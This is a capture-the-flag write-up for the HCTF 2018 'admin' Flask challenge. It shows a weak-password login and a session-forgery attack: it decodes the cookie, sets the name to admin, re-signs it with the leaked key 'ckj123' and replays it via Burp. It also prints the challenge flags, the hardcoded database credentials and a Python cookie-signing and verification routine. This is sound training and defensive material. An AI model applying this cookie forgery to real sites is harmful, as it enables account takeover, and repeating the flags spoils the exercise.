BUUCTF WEB [HCTF 2018]admin
Solution 1
Log in with a weak password:
admin
123
Get the flag:
flag{195df147-fa34-4359-b475-94f71265d085}
Solution 2
Press F12 to view the page source; on the change page there is a comment:
<!-- https://github.com/woadsl1234/hctf_flask/ -->
Download the source code and analyze it. The site is built with Flask templates, so try SSTI (template injection).
Look at the routing information.
routes.py

@app.route('/')
@app.route('/index')
def index():
    return render_template('index.html', title = 'hctf')

index.html

{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>
{% include('footer.html') %}
index.html contains an injection point:
Hello {{ session['name'] }}
Try forging the session. First, use flask_session_cookie_manager to decode the current session:

python3 flask_session_cookie_manager3.py decode -c ".eJw9kMGKgzAURX9leGsXmnY2hS5mSCeM8BIM0ZBsSsemamw6oJZaS_99xIEu7urA4d77gP2pc30Nm6G7ugj2zRE2D3j7gQ0gyyecZC1oHSzNVkjk2YSiRrq7WVqcOS3fecjuXONovUkEzWNkuEZmYuOrldC8EXqXGLJ4vJk-JvQZ4UG2SPLRqNlFvjwn3zH3tkW9G1EdA9IsQZK2NsyMmRVn2VowG7gyhHsZhCoTy3CyAQmqNKAyW3hGUPbdaT_8tu7ymmB1URsi58r5aHXaCFbMmSsS2Qj1ebbajMjSmk-y4T6_W1ol_LZddE04VO5lKvPBuOqfXA5hBjC4foAIrr3rltsgieH5B_EYa-E.YlvM9w.qndN8qh-krjrQ-rlSxvdMc6AFNY"

which gives:
b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"test","user_id":"10"}'
Then change the value of name to admin:
b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"admin","user_id":"10"}'
In config.py, find the key used to sign the session (the writeup's "salt"):

import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

Encode (sign) the modified session with that key:
python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh':True,'_id': b'0e334a88fd473debea010d5e4796d25c1f658540c80f4b879cb9a5ce334cc032466dd3e1a5a3ac7b466d1a117f0453bdfac4f74d88ff56664f975dc3fc612f16','csrf_token': b'eeacda051ebb8eb8c83db90eef10ba74b652d857','image': b'qKXz','name':'admin','user_id':'10'}"
.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
Use Burp to replace the session cookie and send the request:

GET /index HTTP/1.1
Host: 68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
Connection: close
Get the flag:
flag{195df147-fa34-4359-b475-94f71265d085}
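As an added example (not the writeup's tool and not the challenge code), the stdlib-only Python below shows what the decode/encode steps above rely on: the session payload is just base64 (optionally zlib) JSON that anyone can read without a key, and the only thing binding it to the server is an HMAC-SHA1 whose key is derived from SECRET_KEY, so a guessable value like 'ckj123' is the entire weakness. The format details (salt 'cookie-session', "hmac" key derivation, big-endian timestamp, plain JSON instead of Flask's tagged JSON with its " b" entries) are assumed from itsdangerous 2.x as used by Flask 2.

```python
import base64, hashlib, hmac, json, time, zlib
from typing import Optional

# Flask signs session cookies with itsdangerous' URLSafeTimedSerializer using this salt
# and "hmac" key derivation with SHA-1 (assumed itsdangerous 2.x / Flask 2 behaviour).
SALT = b"cookie-session"

def _b64d(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64e(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def _derived_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" derivation: the signing key is HMAC-SHA1(SECRET_KEY, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()

def decode_payload(cookie: str) -> dict:
    """Read the session contents WITHOUT any key: the payload is base64(+zlib) JSON,
    never encrypted. A leading '.' marks a zlib-compressed payload."""
    compressed = cookie.startswith(".")
    raw = _b64d(cookie.lstrip(".").split(".")[0])
    return json.loads(zlib.decompress(raw) if compressed else raw)

def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build '<payload>.<timestamp>.<signature>' the way Flask does (plain JSON here)."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    comp, prefix = zlib.compress(raw), ""
    if len(comp) < len(raw) - 1:          # itsdangerous compresses only when it pays off
        raw, prefix = comp, "."
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = f"{prefix}{_b64e(raw)}.{_b64e(ts_bytes)}"
    sig = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{_b64e(sig)}"

def verify_session(cookie: str, secret_key: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Server-side check: constant-time signature compare, optional age limit.
    Returns the session dict, or None if the cookie was not signed with this key."""
    value, _, sig = cookie.rpartition(".")
    expected = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(_b64d(sig), expected):
        return None
    ts = int.from_bytes(_b64d(value.rsplit(".", 1)[1]), "big")
    if max_age is not None and time.time() - ts > max_age:
        return None
    return decode_payload(cookie)
```

The defensive takeaway is in verify_session: a cookie signed under 'ckj123' is rejected the moment the server uses a long random SECRET_KEY, and nothing in the payload itself is secret.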